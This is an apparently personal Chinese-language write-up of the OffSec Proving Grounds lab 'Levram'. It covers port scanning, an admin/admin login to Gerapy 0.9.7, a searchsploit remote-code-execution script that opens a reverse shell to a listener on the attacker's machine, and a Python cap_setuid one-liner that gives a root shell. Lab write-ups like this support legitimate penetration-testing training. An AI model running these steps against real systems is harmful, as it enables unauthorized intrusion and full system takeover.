OSCP Levram Write-up

一、靶场详情

靶场名称：

Levram

靶场地址：

OffSec Proving Grounds Practice 实验环境

二、思路总结

突破边界：

Gerapy 弱口令 –> 后台远程代码执行 –> app 用户权限 –> 用户旗帜

权限提升：

Python Capabilities cap_setuid 特权 –> root 用户权限 –> 管理员旗帜

三、靶场攻击演示

3.1 靶场信息收集

TCP 端口扫描：

sudo nmap -p- 192.168.147.24 --min-rate=2000

Nmap scan report for 192.168.147.24
Host is up (0.11s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8000/tcp open  http-alt

UDP 端口扫描：未发现有价值信息。

TCP 服务信息搜集：

sudo nmap -p22,8000 -sCV 192.168.147.24

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
8000/tcp open  http    WSGIServer 0.2 (Python 3.10.6)
|_http-cors: GET POST PUT DELETE OPTIONS PATCH
|_http-title: Gerapy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

系统为 Linux 环境，开放有 HTTP、SSH 服务。

3.2 渗透测试突破边界

3.2.1 Gerapy 弱口令、后台远程代码执行

访问系统 HTTP 8000 端口，利用弱口令可成功登录后台，在后台发现该应用为 Gerapy v0.9.7。

admin/admin

searchsploit 检索，发现应用存在远程代码执行漏洞。

searchsploit Gerapy 0.9.7

复制 py 脚本至当前目录，kali 使用 nc 监听 4444 端口，执行漏洞利用脚本获取到系统 app 用户 shell。

searchsploit -m python/remote/50640.py
nc -lvnp 4444
python3 50640.py -t 192.168.147.24 -p 8000 -L 192.168.45.155 -P 4444

升级为交互式 shell。

3.2.3 用户旗帜获取

3.3 提权获取系统管理员权限

3.3.1 Python Capabilities 提权至 root 权限

使用 linpeas 或通过 getcap 命令可得知系统 Python3.10 具有 cap_setuid 权限，利用该配置可提权至系统 root 权限。

getcap -r / 2>/dev/null
./linpeas.sh

参考链接：

https://gtfobins.github.io/gtfobins/python/#capabilities

/usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/sh")'
bash -p

3.3.2 管理员旗帜获取

Thanks

如果我的文章对您有帮助或您希望与我更多交流，欢迎点击「关于我」，通过页面中的微信公众号、邮箱或 Discord 与我联系；若您发现文章中存在任何错误或不足之处，也非常欢迎通过以上方式指出，在此一并致以衷心的感谢。 😊🫡

最后，祝您生活愉快！🌞✨